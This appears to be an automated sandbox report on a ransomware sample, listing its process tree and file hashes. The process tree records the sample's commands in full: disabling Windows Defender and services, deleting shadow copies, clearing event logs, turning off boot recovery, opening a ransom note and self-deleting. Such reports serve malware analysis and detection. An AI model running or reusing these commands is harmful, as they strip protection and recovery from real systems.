net.exe PID 1400 wrote to memory of 1804 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe net.exe PID 1804 wrote to memory of 1168 1804 net.exe net1.exe PID 1804 wrote to memory of 1168 1804 net.exe net1.exe PID 1804 wrote to memory of 1168 1804 net.exe net1.exe PID 1400 wrote to memory of 992 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe sc.exe PID 1400 wrote to memory of 992 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe sc.exe PID 1400 wrote to memory of 992 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe sc.exe PID 1400 wrote to memory of 952 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe sc.exe PID 1400 wrote to memory of 952 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe sc.exe PID 1400 wrote to memory of 952 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe sc.exe PID 1400 wrote to memory of 1776 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe sc.exe PID 1400 wrote to memory of 1776 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe sc.exe PID 1400 wrote to memory of 1776 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe sc.exe PID 1400 wrote to memory of 1956 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe sc.exe PID 1400 wrote to memory of 1956 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe sc.exe PID 1400 wrote to memory of 1956 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe sc.exe PID 1400 wrote to memory of 1704 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe sc.exe PID 1400 wrote to memory of 1704 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe sc.exe PID 1400 wrote to memory of 1704 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe sc.exe PID 1400 wrote to memory of 1352 1400 ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe"C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe"1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1400 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:1160
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:696 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1224
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1252 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:764
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:816 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1544
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1952 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:740
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:956 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:960
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1560
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1804 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1168
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:992
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:952
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1776
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1956
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1704
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵PID:1352
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1192
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:916
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1732
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1584
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:532
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1160
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1372
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1832
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1100
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1460
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:736
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1040
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1836
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1104
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1624
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1772
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1920
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1380
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1900
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:892
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1604
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1384
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1652
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:680
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:728
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1588
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:2044
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1284
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:2000
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:776
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1312
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1716
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1608
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:520 -
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1572
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1324 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1708 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:884 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1612 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1476 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:972 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:660 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1468 -
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1560
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1064 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1048
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1156 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:1092
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1064 -
C:\Windows\system32\notepad.exenotepad.exe C:\vyS2_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2336 -
C:\Windows\system32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe"2⤵PID:2344
-
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:2368
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD50b3d25fb685158a43d4a56861a448756
SHA11eb3e477363f853566f5086128a369f25862aa3a
SHA25623b030291621f64706be3337f51b643ce70b8f7b3adeb39e9850d6449510f303
SHA512d3abc5607676f125fed3d0b4325606c32afed05196af2064734245736e065e966493f307e25e4f6be7fcc1684423e12f4864ef32dcdbcc442aaba357dcbdb670
-
MD5
ee121b1deb962e44600cf271791ebd82
SHA11c5b22c8856b15843ac236159b558e1fdca8dc04
SHA25634ed6223e7de680957e45d9fbf0117506a2820990380a279a1272465f49ee811
SHA512f5136d2bd9e539af874aff551b600d760b3867ad88c250fafe5a2e1f10eb0a673a115710d43074649ede4f5c6401be3aa7fdce70fd4c777a8aa7ebb83af31d4a